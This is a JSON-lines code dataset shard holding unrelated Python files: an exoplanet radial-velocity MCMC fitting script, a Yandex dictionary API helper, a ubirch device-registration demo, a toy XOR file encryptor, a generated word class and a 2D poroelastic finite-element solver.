ax.plot( np.rot90(sampler.chain[:, :, i], 3), \"k\", alpha=0.3)\n ax.set_xlim(0, sampler.chain.shape[1])\n ax.set_ylabel(labels_log[i])\n ax.yaxis.set_label_coords(-0.1, 0.5)\n\naxes[-1].set_xlabel(\"step number\");\nplt.savefig('HD85390-2-Trace.png')\n# plt.show()\n\n\nimport corner\nlabels=[\"1\", \"2\", \"3\", r\"$P1$\", r\"$T_{1}$\", r\"$K1$\", r\"$\\omega1$\", r\"$e1$\", r\"$P2$\", r\"$T_{2}$\", r\"$K2$\", r\"$\\omega2$\", r\"$e2$\", \"offset1\", \"offset2\"]\nfig = corner.corner(real_samples, labels=labels, quantiles=[0.16, 0.5, 0.84], show_titles=True)\nplt.savefig('HD85390-3-Corner.png')\n# plt.show()\n\n\n#==============================================================================\n# Output\n#==============================================================================\n\nv0, v1, v2, a0, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11 = map(lambda v: (v[1], v[2]-v[1], v[1]-v[0]), zip(*np.percentile(real_samples, [16, 50, 84], axis=0)))\naa = np.zeros((12,3))\naa[0,:] = [a0[i] for i in range(3)]\naa[1,:] = [a1[i] for i in range(3)]\naa[2,:] = [a2[i] for i in range(3)]\naa[3,:] = [a3[i] for i in range(3)]\naa[4,:] = [a4[i] for i in range(3)]\naa[5,:] = [a5[i] for i in range(3)]\naa[6,:] = [a6[i] for i in range(3)]\naa[7,:] = [a7[i] for i in range(3)]\naa[8,:] = [a8[i] for i in range(3)]\naa[9,:] = [a9[i] for i in range(3)]\naa[10,:]= [a10[i] for i in range(3)]\naa[11,:]= [a11[i] for i in range(3)]\nnp.savetxt('HD85390_fit.txt', aa, fmt='%.6f')\n\n\n\nP1, tau1, k1, w1, e1, P2, tau2, k2, w2, e2, offset1, offset2 = aa[:,0]\nfig = plt.figure(figsize=(10, 7))\nframe1 = fig.add_axes((.15,.3,.8,.6))\nframe1.axhline(y=0, color='k', ls='--', alpha=.3)\nt_sample = np.linspace(min(x), max(x), num=10001, endpoint=True)\n# Planet 1 #\nPlanet1 = Model(P1=P1/100, tau1=tau1/1000, k1=k1/100, w1=w1, e1=e1, \n P2=P2/100, tau2=tau2/1000, k2=0, w2=w2, e2=e2, offset1=offset1, offset2=0)\ny1 = Planet1.get_value(t_sample)\nplt.plot(t_sample, y1, 'b-.', alpha=.3, label='Planet1')\n# Planet 2 #\nPlanet2 = Model(P1=P1/100, tau1=tau1/1000, k1=0, w1=w1, e1=e1, \n P2=P2/100, tau2=tau2/1000, k2=k2/100, w2=w2, e2=e2, offset1=0, offset2=offset2)\ny2 = Planet2.get_value(t_sample)\nplt.plot(t_sample, y2, 'b--', alpha=.3, label='Planet2')\n# Planet1 + Planet2 #\ny12 = y1 + y2\nplt.plot(t_sample, y12, 'b-', alpha=.5, label='Planet1+Planet2')\nplt.errorbar(x, y, yerr=yerr, fmt=\".k\", capsize=0, label='HARPS RV')\nplt.legend()\nplt.ylabel(\"Radial velocity [m/s]\")\n\nfit_curve = Model(P1=P1/100, tau1=tau1/1000, k1=k1/100, w1=w1, e1=e1, \n P2=P2/100, tau2=tau2/1000, k2=k2/100, w2=w2, e2=e2, offset1=offset1, offset2=offset2)\ny_fit = fit_curve.get_value(x)\n\nresidual = y_fit - y\nchi2 = sum(residual**2 / yerr**2)\nrms = np.sqrt(np.mean(residual**2))\nwrms = np.sqrt(sum((residual/yerr)**2) / sum(1/yerr**2))\n\nframe2 = fig.add_axes((.15,.1,.8,.2)) \nframe2.axhline(y=0, color='k', ls='--', alpha=.3)\nplt.errorbar(x, residual, yerr=yerr, fmt=\".k\", capsize=0)\nplt.xlabel(\"BJD - 2400000\")\nplt.ylabel('Residual [m/s]')\nplt.savefig('HD85390-4-MCMC_fit.png')\nplt.close(\"all\")\n\n\nsolution = np.arange(15)\nsolution[0] = v0[0]\nsolution[1] = v1[0]\nsolution[2] = v2[0]\nsolution[3:] = aa[:,0]\n\ngp.set_parameter_vector(solution)\n# Make the maximum likelihood prediction\nt = np.linspace(min(x), max(x), 10000)\nmu, var = gp.predict(y, t, return_var=True)\nstd = np.sqrt(var)\n\n\n# Plot the data\nplt.figure()\ncolor = \"#ff7f0e\"\nplt.errorbar(x, y, yerr=yerr, fmt=\".k\", capsize=0)\nplt.plot(t, mu, 
color=color)\nplt.fill_between(t, mu+std, mu-std, color=color, alpha=0.3, edgecolor=\"none\")\nplt.ylabel(r\"$y$\")\nplt.xlabel(r\"$t$\")\nplt.gca().yaxis.set_major_locator(plt.MaxNLocator(5))\nplt.title(\"maximum likelihood prediction\");\nplt.savefig('HD85390-5-prediction.png')\n\n\nos.chdir('..')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"0828-GP_85390/celerite1536200028.9306116/GP_85390_celerite_1_planet.py","file_name":"GP_85390_celerite_1_planet.py","file_ext":"py","file_size_in_byte":11161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"72298785","text":"\"\"\"\nThis module provides API functionality for yandex lingvo services.\n\"\"\"\n\nimport logging\nimport requests\n\nimport pyaspeller\n\nlogging.getLogger(__name__).addHandler(logging.NullHandler())\n\nYKEY = ''\nENDPOINT = 'https://dictionary.yandex.net/api/v1/dicservice.json/lookup?'\n\n\ndef answer_spellcheck(spellcheck, translate):\n if spellcheck:\n if not spellcheck.correct:\n if spellcheck.spellsafe:\n if translate:\n return ' _Your request was corrected!_\\n' + translate\n return ' _Your request was corrected!_\\n'\n return translate\n\n\ndef prepare_message(msg):\n if msg.startswith('/tr'):\n msg = msg[4:]\n if not msg:\n return 'Your request is empty. Try again.'\n check = msg.replace('`', '')\n if not check:\n msg = 'tilde(s)'\n else:\n msg = check\n try:\n spellcheck = pyaspeller.Word(msg)\n if spellcheck.spellsafe:\n msg = spellcheck.spellsafe\n except Exception as err:\n logging.exception(str(err))\n spellcheck = None\n try:\n translate = get_word(msg)\n except Exception as err:\n logging.exception(str(err))\n translate = 'Sorry, something went wrong!'\n if not translate:\n translate = answer_spellcheck(spellcheck, translate)\n translate = translate + u\"Sorry, can't find anything for `{}`.\"\n else:\n translate = answer_spellcheck(spellcheck, translate)\n translate = '`{}`\\n' + translate\n return translate.format(msg)\n\n\ndef get_word(src):\n data = requests.get(\n ENDPOINT + requests.compat.urlencode(\n {'key': YKEY, 'lang': 'en-ru', 'text': src})\n )\n json_dump = data.json()\n if not json_dump:\n return\n res = ''\n delimeter = '\\n'\n nbsp = u'\\xa0'\n for _, topic in enumerate(json_dump['def']):\n res += '_{0}_{1}'.format(topic['pos'], delimeter)\n for tr in topic['tr']:\n res += u'*{nbsps}{text}*{delimeter}'.format(\n nbsps=4 * nbsp, text=tr['text'], delimeter=delimeter)\n if 'ex' in tr:\n res += 8 * nbsp + tr['ex'][0]['text'] + ' --- ' + \\\n '//'.join([etr['text']\n for etr in tr['ex'][0]['tr']]) + delimeter\n with open('query_list.log', 'a') as query_list:\n try:\n query_list.write(src + '\\n')\n except UnicodeEncodeError as err:\n logging.exception(str(err))\n return res\n","sub_path":"yadict.py","file_name":"yadict.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"525720414","text":"#! /usr/bin/env python3\n#\n# Copyright (c) 2018 ubirch GmbH.\n#\n# @author Matthias L. 
Jugel\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport atexit\nimport binascii\nimport configparser\nimport logging\nimport pickle\nimport time\nfrom datetime import datetime\nfrom uuid import UUID, uuid4\n\nimport requests\n\nimport ubirch\nfrom ubirch.ubirch_protocol import UBIRCH_PROTOCOL_TYPE_REG\n\nlogging.basicConfig(format='%(asctime)s %(name)20.20s %(levelname)-8.8s %(message)s', level=logging.DEBUG)\nlogger = logging.getLogger()\n\n\n########################################################################\n# Implement the ubirch-protocol with signing and saving the signatures\nclass Proto(ubirch.Protocol):\n\n def __init__(self, key_store: ubirch.KeyStore, uuid: UUID) -> None:\n super().__init__()\n self.__ks = key_store\n self.load(uuid)\n logger.info(\"ubirch-protocol: device id: {}\".format(uuid))\n\n def persist(self, uuid: UUID):\n signatures = self.get_saved_signatures()\n with open(uuid.hex + \".sig\", \"wb\") as f:\n pickle.dump(signatures, f)\n\n def load(self, uuid: UUID):\n try:\n with open(uuid.hex + \".sig\", \"rb\") as f:\n signatures = pickle.load(f)\n logger.info(\"loaded {} known signatures\".format(len(signatures)))\n self.set_saved_signatures(signatures)\n except:\n logger.warning(\"no existing saved signatures\")\n pass\n\n def _sign(self, uuid: UUID, message: bytes) -> bytes:\n return self.__ks.find_signing_key(uuid).sign(message)\n\n\n########################################################################\n\n# load configuration from storage\nconfig = configparser.ConfigParser()\nconfig.read('demo-device.ini')\nif not config.has_section('device'):\n config.add_section('device')\n config.set('device', 'uuid', str(uuid4()))\n auth = input(\"Enter your API authentication token:\")\n config.set('device', 'auth', auth)\n config.set('device', 'env', 'demo')\n config.set('device', 'debug', 'False')\n config.set('device', 'groups', '')\n with open('demo-device.ini', \"w\") as f:\n config.write(f)\n\nuuid = UUID(hex=config.get('device', 'uuid'))\nauth = config.get('device', 'auth')\nenv = config.get('device', 'env', fallback=None)\ndebug = config.getboolean('device', 'debug', fallback=False)\ngroups = list(filter(None, config.get('device', 'groups', fallback=\"\").split(\",\")))\n\nlogger.info(\"UUID : {}\".format(uuid))\nlogger.info(\"AUTH : {}\".format(auth))\nlogger.info(\"ENV : {}\".format(env))\nlogger.info(\"DEBUG: {}\".format(debug))\n\n# create a new device uuid and a keystore for the device\nkeystore = ubirch.KeyStore(uuid.hex + \".jks\", \"test-keystore\")\n\n# check if the device already has keys or generate a new pair\nif not keystore.exists_signing_key(uuid):\n keystore.create_ed25519_keypair(uuid)\n\n# create new protocol\nproto = Proto(keystore, uuid)\n\n# use the ubirch API to create a new device and send data using the ubirch-protocol\napi = ubirch.API(auth=auth, debug=debug, env=env)\n\n# check if the device exists and delete if that is the case\nif api.device_exists(uuid):\n logger.warning(\"device {} exists, 
deleting\".format(str(uuid)))\n    api.device_delete(uuid)\n    time.sleep(2)\n\n# create a new device on the backend\nr = api.device_create({\n    \"deviceId\": str(uuid),\n    \"deviceTypeKey\": \"genericSensor\",\n    \"deviceName\": str(uuid),\n    \"hwDeviceId\": str(uuid),\n    \"tags\": [\"demo\", \"python-client\"],\n    \"groups\": groups,\n    \"deviceProperties\": {\n        \"storesData\": True,\n        \"blockChain\": False\n    },\n    \"created\": \"{}Z\".format(datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3])\n})\nif r.status_code == requests.codes.ok:\n    logger.info(\"created new device: {}\".format(str(uuid)))\n    logger.debug(r.content)\n    time.sleep(2)\nelse:\n    logger.error(r.content)\n    raise Exception(\"new device creation failed\")\n\n# register the device's identity\nif not api.is_identity_registered(uuid):\n    registration_message = proto.message_signed(uuid, UBIRCH_PROTOCOL_TYPE_REG, keystore.get_certificate(uuid))\n    r = api.register_identity(registration_message)\n    if r.status_code == requests.codes.ok:\n        logger.info(\"registered new identity: {}\".format(uuid))\n    else:\n        logger.error(\"device registration failed: {}\".format(uuid))\n    logger.debug(r.content)\n\n# send data packages\n\n# message 1 - binary message no payload interpretation\nmsg = proto.message_chained(uuid, 0x00, bytearray([1,2,3,4,5]))\nlogger.info(binascii.hexlify(msg))\nr = api.send(msg)\nlogger.info(\"1: {}: {}\".format(r.status_code, r.content))\n\n# message 2 - interpreted payload message chained\nmsg = proto.message_chained(uuid, 0x53, {'ts': int(datetime.utcnow().timestamp()), 'v': 99})\nlogger.info(binascii.hexlify(msg))\nr = api.send(msg)\nlogger.info(\"2: {}: {}\".format(r.status_code, r.content))\n\n# message 3 (chained to message 2)\nmsg = proto.message_chained(uuid, 0x53, {\"ts\": int(datetime.utcnow().timestamp()), \"v\": 100})\nlogger.info(binascii.hexlify(msg))\nr = api.send(msg)\nlogger.info(\"3: {}: {}\".format(r.status_code, r.content))\n\natexit.register(proto.persist, uuid)\n","sub_path":"examples/test-protocol.py","file_name":"test-protocol.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"200446027","text":"c=0\ni=1\ndef accept_N(n):\n\tglobal i,c\n\tif(i==1):c=n\n\tif(c>=i):\n\t\tprint(i,end=\" \")\n\t\ti+=1\n\t\taccept_N(i)\n\t\n\nif __name__ == \"__main__\": \n\tprint(\"Input :\",end=\" \")\n\tx=int(input())\n\tprint(\"Output:\",end=\" \")\n\taccept_N(x)","sub_path":"Marvellous_Infosystem_Assignment_5/Assingment5_2.py","file_name":"Assingment5_2.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"567169148","text":"#coding: utf-8\n\ndef pause():\n    a = ''\n    input(a)\n    \ndef read_chunk(f, chunksize):\n    while True:\n        chunk = f.read(chunksize)\n        if chunk:\n            yield chunk\n        else:\n            break\n    \ndef decale(M,bytes):\n    global l\n    if len(M) == l:\n        del M[0]\n    M.append(bytes)\n    return M\n    \ndef chiffr(M):\n    global l\n    S = []\n    for i in M[0]:\n        S.append(int(i))\n    for i in range(len(S)): # not necessarily = l! (e.g. at the end of the file)\n        for j in range(1,l):\n            try:\n                S[i] ^= M[j].ljust(l,bytes(1))[i]\n            except:\n                print(\"Encryption problem:\")\n                print(M)\n                print(\"Cannot encode correctly\")\n                pause()\n    #if len(M[0]) != 8:\n    #    print(\"Pouet\")\n    return bytes(S) # NOT NECESSARILY OF LENGTH l!\n    \n#if False: # for testing the program\nl = '' #----------- start of the user prompt\nprint('Depth? (default: 8)')\nl = input()\ntry:\n    l = int(l)\nexcept:\n    l = 8\nif l < 1:\n    l = 8\n\nprint('Name/path of the file?')\nnom_source = input()\ntry:\n    f = open(nom_source,'r')\n    f.close()\nexcept:\n    print('Cannot open the file to encrypt')\n    exit(-1)\n    \nprint('Type the key (s) or use a key file (f): ')\nchoix = ''\nwhile choix != 's' and choix != 'f':\n    choix = input()\nif choix == 's':\n    print('Please type the key:')\n    key = input()\nelse:\n    print('Please enter the path of the key file:')\n    key_addr = input()\n    try:\n        f = open(key_addr)\n        key = f.read()\n    except:\n        print('Cannot open the key file')\n        exit(-1)\nprint('Output file? (default: out.dea):')\n\nnom_dest = input()\nif nom_dest == '':\n    nom_dest = 'out.dea'\nprint('input: {}'.format(nom_source))\nprint('key: {}'.format(key))\nprint('depth: {}'.format(l))\nprint('output: {}'.format(nom_dest))\nprint('Confirm the settings (y/n)?')\nok = input()\nif ok.lower() not in ['y','o']:\n    print(\"Aborted.\")\n    exit(0) #---------- end of the user prompt\n\n\n#l = 8 # test values\n#nom_source = \"a.txt\"\n#key = \"1234568\"\n#nom_dest = \"out.dea\" #---\n\nwhile len(key) < l*(l-1): # to get a key of the right length\n    key +=key\nkey = key[:l*(l-1)]\n\n#print(key)\nsource = open(nom_source,\"rb\")\ndest = open(nom_dest,\"wb\")\nM = []\n\nfor i in read_chunk(source, l): # encrypt the file without using the key\n    M = decale(M, i)\n    if len(M) == l:\n        S = chiffr(M)\n        dest.write(S)\nsource.close()\n\nrow = ''\nfor i in key: # encrypt the tail, using the key\n    row += i\n    if len(row) == 8:\n        M = decale(M,bytes(row,'utf-8'))\n        dest.write(chiffr(M))\n        row = ''\n\ndest.close()\n\n","sub_path":"crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"86233239","text":"\n\n# class header\nclass _DOMESTIC():\n\tdef __init__(self,): \n\t\tself.name = \"DOMESTIC\"\n\t\tself.definitions = [u'a fight or attack that happens in a home between people who know each other: ', u\"someone paid to do work, such as cleaning and cooking, in someone else's house\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_domestic.py","file_name":"_domestic.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"345704535","text":"import numpy as np\nimport scipy.linalg\nimport scipy.sparse\nimport scipy.sparse.linalg\nfrom matplotlib.patches import Polygon\nfrom matplotlib.collections import PatchCollection\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport scipy.interpolate\nimport netCDF4\n\nimport warnings\nwarnings.simplefilter(action = \"ignore\", category = FutureWarning)\n\n\nclass TwoDimCoupledFEM():\n    \n    def __init__(self, nodes, connect, mu, nu, alpha, bc_nodes=[], bc_vals=[]):\n        \n        self.X = nodes[:,0]\n        self.Y = nodes[:,1]\n        self.connect = (connect - 1)\n        \n        self.nu = nu\n        self.mu = mu\n        self.alpha = alpha\n        \n        self.num_elem = len(self.connect)\n        \n    \n    def dNdxi(self, xi, eta):\n        \n        return [eta/4. - eta**2/4. - (eta*xi)/2. + (eta**2*xi)/2.,\n                -eta/4. + eta**2/4. - (eta*xi)/2. + (eta**2*xi)/2.,\n                eta/4. + eta**2/4. + (eta*xi)/2. + (eta**2*xi)/2.,\n                -eta/4. - eta**2/4. + (eta*xi)/2. 
+ (eta**2*xi)/2.,\n eta*xi - eta**2*xi,\n 0.5 - eta**2/2. + xi - eta**2*xi,\n -(eta*xi) - eta**2*xi,\n -0.5 + eta**2/2. + xi - eta**2*xi,\n -2*xi + 2*eta**2*xi]\n \n \n def dNdeta(self, xi, eta):\n \n return [xi/4. - (eta*xi)/2. - xi**2/4. + (eta*xi**2)/2.,\n -xi/4. + (eta*xi)/2. - xi**2/4. + (eta*xi**2)/2.,\n xi/4. + (eta*xi)/2. + xi**2/4. + (eta*xi**2)/2.,\n -xi/4. - (eta*xi)/2. + xi**2/4. + (eta*xi**2)/2.,\n -0.5 + eta + xi**2/2. - eta*xi**2,\n -(eta*xi) - eta*xi**2,\n 0.5 + eta - xi**2/2. - eta*xi**2,\n eta*xi - eta*xi**2,\n -2*eta + 2*eta*xi**2]\n \n def Nu(self, xi, eta):\n \n return [(eta*xi)/4. - (eta**2*xi)/4. - (eta*xi**2)/4. + (eta**2*xi**2)/4.,\n -(eta*xi)/4. + (eta**2*xi)/4. - (eta*xi**2)/4. + (eta**2*xi**2)/4.,\n (eta*xi)/4. + (eta**2*xi)/4. + (eta*xi**2)/4. + (eta**2*xi**2)/4.,\n -(eta*xi)/4. - (eta**2*xi)/4. + (eta*xi**2)/4. + (eta**2*xi**2)/4.,\n -eta/2. + eta**2/2. + (eta*xi**2)/2. - (eta**2*xi**2)/2.,\n xi/2. - (eta**2*xi)/2. + xi**2/2. - (eta**2*xi**2)/2.,\n eta/2. + eta**2/2. - (eta*xi**2)/2. - (eta**2*xi**2)/2.,\n -xi/2. + (eta**2*xi)/2. + xi**2/2. - (eta**2*xi**2)/2.,\n 1 - eta**2 - xi**2 + eta**2*xi**2]\n \n \n def Np(self, xi, eta):\n \n return [0.25 * (1 - xi) * (1 - eta), # - -\n 0.25 * (1 - xi) * (1 + eta), # - +\n 0.25 * (1 + xi) * (1 + eta), # + +\n 0.25 * (1 + xi) * (1 - eta) ] # - + -\n \n def dNpdxi(self, xi, eta):\n \n return [-1*(1-eta)/4, (1-eta)/4, (1+eta)/4, -1*(1+eta)/4]\n\n def dNpdeta(self, xi, eta):\n \n return [-1*(1-xi)/4, -1*(1-xi)/4, (1+xi)/4, (1-xi)/4] \n \n def dNp(self, xi, eta):\n\n dNp = np.zeros([2,4])\n dNp[0,:] = self.dNpdxi(xi, eta)\n dNp[1,:] = self.dNpdeta(xi, eta)\n \n return dNp \n\n def compute_tensor_mobility(self, k, mu):\n \n # Mobility tensor is 2x2 (2D example)\n \n Q = np.zeros([2,2])\n Q[0,0] = k/mu\n Q[1,1] = k/mu \n \n return Q\n \n def compute_jacobian_matrix_and_inverse(self, xi, eta):\n \n x = self.X\n y = self.Y\n con = self.connect\n \n J11 = np.dot(x[con], self.dNdxi(xi, eta))\n J12 = np.dot(y[con], self.dNdxi(xi, eta))\n J21 = np.dot(x[con], self.dNdeta(xi, eta))\n J22 = np.dot(y[con], self.dNdeta(xi, eta))\n \n self.detJ = J11 * J22 - J12 * J21\n \n self.Jinv11 = J22 / self.detJ\n self.Jinv12 = -J12 / self.detJ\n self.Jinv21 = -J21 / self.detJ\n self.Jinv22 = J11 / self.detJ\n \n \n def compute_B_matrix(self, xi, eta):\n \n self.compute_jacobian_matrix_and_inverse(xi, eta)\n \n dNxi = self.dNdxi(xi, eta)\n dNeta = self.dNdeta(xi, eta)\n \n Nmat = np.zeros((4, 2 * len(dNxi)))\n Nmat[0,0::2] = dNxi\n Nmat[1,0::2] = dNeta\n Nmat[2,1::2] = dNxi\n Nmat[3,1::2] = dNeta\n \n zero = np.zeros(len(self.detJ))\n \n Jmat = np.array([[self.Jinv11, self.Jinv12, zero, zero],\n [self.Jinv21, self.Jinv22, zero, zero],\n [zero, zero, self.Jinv11, self.Jinv12],\n [zero, zero, self.Jinv21, self.Jinv22]])\n \n Dmat = np.array([[1.,0.,0.,0.],[0.,0.,0.,1.],[0.,1.,1.,0.]])\n \n #B = D * J * N\n return np.einsum('ij,jk...,kl',Dmat,Jmat,Nmat)\n \n \n def compute_stiffness_integrand(self, xi, eta, nu, mu):\n \n Ey = 2 * mu * (1 + nu)\n \n c11 = Ey * (1 - nu * nu) / ((1 + nu) * (1 - nu - 2 * nu * nu))\n c12 = Ey * nu / (1 - nu - 2 * nu * nu)\n c66 = Ey / (2 * (1 + nu))\n \n # Strain/Displacement Matrix \n Cmat = np.array([[c11, c12, 0], [c12, c11, 0], [0, 0, c66]]);\n \n self.Bmat = self.compute_B_matrix(xi, eta)\n \n #K_{il} = B_{ji} C_{jk} B_{kl} \\det(J)\n return np.einsum('...ji,jk,...kl,...',self.Bmat,Cmat,self.Bmat,self.detJ)\n \n \n def compute_coupling_integrand(self, xi, eta, alpha):\n \n #Q = B^T * m *alpha * Np\n m = 
np.array([1.0, 1.0, 0.0]) * alpha\n \n Np = self.Np(xi, eta)\n \n return np.einsum('...ij,i,k,...',self.Bmat,m,Np,self.detJ)\n\n def compute_storativity_integrand(self, xi, eta, alpha, phi, Ks, Kf):\n \n #S = Np^T * ( (alpha - phi)/Ks + phi/Kf ) * Np\n \n Np = self.Np(xi, eta)\n stor = (alpha-phi)/Ks + phi/Kf\n \n return np.einsum('i,...,k,...',Np,stor,Np,self.detJ)\n \n \n def compute_permeability_integrand(self, xi, eta, Q):\n \n # H = dNp^T * (k/mu) * dNp\n \n dNp = self.dNp(xi, eta)\n \n return np.einsum('...ji,jk,...kl,...',dNp,Q,dNp,self.detJ)\n \n def compute_body_force_RHS(self, xi, eta, rho, g):\n \n # Fg = Nu^T * rho * g \n \n Nu = self.Nu(xi, eta)\n Nu = np.array(Nu).reshape([1,np.size(Nu)])\n \n return np.einsum('...ji,...,...,...',Nu,rho,g,self.detJ)\n \n def compute_fluid_pressure_force(self, xi, eta, Q, rho_f):\n \n # Fp = dNp^T * (k/mu) * rho_f * g\n g = np.zeros([2,1])\n g[1] = self.g\n dNp = self.dNp(xi, eta)\n return np.einsum('...ji,jk,...,kl...,...',dNp,Q,rho_f,g,self.detJ) \n return dNp\n \n \n def integrate_element_matrices(self):\n \n #Use 3 x 3 Gauss integration\n wts = [5 / 9., 8 / 9., 5 / 9.]\n pts = [-np.sqrt(3 / 5.), 0.0, np.sqrt(3 / 5.)]\n \n # Make up permeability/viscosity info\n perm = 10. *9.8692327E-16 # m**2\n visc = 0.002 # Pa*sec\n phi = 0.1\n Vp = 2360 # m/s\n Vs = 1302 # m/s\n rho_m = 2260 # kg/m**3\n rho_f = 1000 # kg/m**3\n rho = rho_m*(1.0-phi) + rho_f*phi # Bulk Density, kg/m**3\n Ks = rho*(Vp**2 - 0.75 * Vs**2) # Bulk (solid) Modulus, Pa\n Kf = 1/1e9 # Fluid Modulus, Pa (1/cf)\n \n \n \n # Ditto Delta T\n \n self.delta_t = 3600 # sec \n \n \n mob_tensor = self.compute_tensor_mobility(perm,visc)\n # Temporary global setting\n self.mob_tensor = self.compute_tensor_mobility(perm,visc) \n \n \n K = np.zeros((self.num_elem, 18, 18))\n Q = np.zeros((self.num_elem, 18, 4))\n H = np.zeros((self.num_elem, 4, 4))\n S = np.zeros((self.num_elem, 4, 4))\n \n for i in range(3):\n for j in range(3):\n K += wts[i] * wts[j] * self.compute_stiffness_integrand(pts[i], pts[j], self.nu, self.mu)\n Q += wts[i] * wts[j] * self.compute_coupling_integrand(pts[i], pts[j], self.alpha)\n H += wts[i] * wts[j] * self.compute_permeability_integrand(pts[i], pts[j], mob_tensor)\n S += wts[i] * wts[j] * self.compute_storativity_integrand(pts[i], pts[j], self.alpha, phi, Ks, Kf)\n \n return (K,Q,H,S)\n \n def integrate_RHS(self):\n\n #Use 3 x 3 Gauss integration\n wts = [5 / 9., 8 / 9., 5 / 9.]\n pts = [-np.sqrt(3 / 5.), 0.0, np.sqrt(3 / 5.)]\n \n Fgu = np.zeros((self.num_elem,9,1))\n Fgp = np.zeros((self.num_elem,4,1)) \n \n for i in range(3):\n for j in range(3):\n Fgu += wts[i] * self.compute_body_force_RHS(pts[i],pts[j],self.rho,self.g)\n Fgp += wts[i] * self.compute_fluid_pressure_force(pts[i], pts[j], self.mob_tensor, self.rho_f)\n return Fgu, Fgp \n\n \n def set_mesh_properties(self):\n\n # Make up permeability/viscosity info\n self.perm = 10. 
*9.8692327E-16 # m**2\n self.visc = 0.002 # Pa*sec\n self.phi = 0.1\n self.Vp = 2360 # m/s\n self.Vs = 1302 # m/s\n self.rho_m = 2260 # kg/m**3\n self.rho_f = 1000 # kg/m**3\n self.rho = self.rho_m*(1.0-self.phi) + self.rho_f*self.phi # Bulk Density, kg/m**3\n self.Ks = self.rho*(self.Vp**2 - 0.75 * self.Vs**2) # Bulk (solid) Modulus, Pa\n self.Kf = 1/1e9 # Fluid Modulus, Pa (1/cf)\n self.g = 9.80 # m/s**2 \n \n def compute_stress_at_gauss_point(self, xi, eta, disp):\n \n mu = self.mu\n nu = self.nu\n \n Ey = 2 * mu * (1 + nu)\n \n c11 = Ey * (1 - nu * nu) / ((1 + nu) * (1 - nu - 2 * nu * nu))\n c12 = Ey * nu / (1 - nu - 2 * nu * nu)\n c66 = Ey / (2 * (1 + nu))\n \n Cmat = np.array([[c11, c12, 0], [c12, c11, 0], [0, 0, c66]]);\n \n Bmat = self.compute_B_matrix(xi, eta)\n \n elem_disp = disp[self.connect].reshape(-1,18)\n \n #stress_{i} = C_{ik} B_{kl} disp{l}\n return np.einsum('ik,...kl,...l',Cmat,Bmat,elem_disp).reshape(-1,3)\n \n \n def compute_stress(self, disp):\n \n #Gauss points\n pts = [-np.sqrt(3 / 5.), 0.0, np.sqrt(3 / 5.)]\n \n return np.array([[ self.compute_stress_at_gauss_point(i, j, disp) for i in pts ] for j in pts])\n \n \n def compute_gauss_point_locations(self, coords):\n \n #Gauss points\n pts = [-np.sqrt(3 / 5.), 0.0, np.sqrt(3 / 5.)]\n \n X = coords[:,0][self.connect]\n Y = coords[:,1][self.connect]\n \n xloc = np.array([[ np.dot(X, self.Nu(i, j)) for i in pts ] for j in pts]).flatten()\n yloc = np.array([[ np.dot(Y, self.Nu(i, j)) for i in pts ] for j in pts]).flatten()\n \n return (xloc, yloc)\n \n \n def assemble(self):\n \n # Institute debug system values\n self.set_mesh_properties()\n \n #Construct a DOF map. We'll start by assuming that every node has 3 DOF\n #this is obviously not true, but we'll correct it.\n fake_dof_map = np.zeros(3*len(self.X), dtype=np.int64).reshape(-1, 3)\n \n #The nodes that actually have pressue DOF's are the \"corner\" nodes of the element\n #or the first 4 nodes in each row of the connectivity array, let's select the others\n no_pressure_dof_nodes = (self.connect[:,4:]).flatten()\n \n #Now for these nodes that do not have pressure DOF's, we'll \"flag\" those DOFs with a -1\n fake_dof_map[:,2][no_pressure_dof_nodes] = -1\n fake_dof_map = fake_dof_map.flatten()\n \n #Now the rest of the DOF indices are not monotonically increasing (we removed some of them\n #and replaced them with -1's), so now we need to replace the non -1 entries with a monotonically\n #increasing DOF map that corresponds to the total number of DOF's. 
First let's figure out\n #how many total DOF's ther are, this corresponds to wherever there are 0's in the fake_dof_map\n total_dof = (fake_dof_map == 0).sum()\n \n #Create a monotonically increasing range from 0 to the total_dof\n dof_range = np.arange(total_dof, dtype=np.int64)\n \n #Replace the 0's in the fake_dof_map with the monotonically increasing range\n fake_dof_map[np.where(fake_dof_map != -1)] = dof_range\n \n #Create the real dof_map, there will still be -1 \"flags\" in the third column\n self.dof_map = fake_dof_map.reshape(-1,3)\n \n #Allocate global stiffness matrix and r.h.s vector\n self.Mat_K = np.zeros((total_dof, total_dof), dtype=np.double)\n self.Mat_K_n = np.zeros((total_dof, total_dof), dtype=np.double) \n self.Vec_F = np.zeros(total_dof, dtype=np.double)\n \n #The DOF indices cooresponding to displacement\n id_disp = (self.dof_map[:,:2][self.connect]).reshape(-1,18)\n # DOF indicies for x dir displacement\n idx_disp = (self.dof_map[:,0][self.connect]).reshape(-1,9) \n # DOF indicies for x dir displacement\n idy_disp = 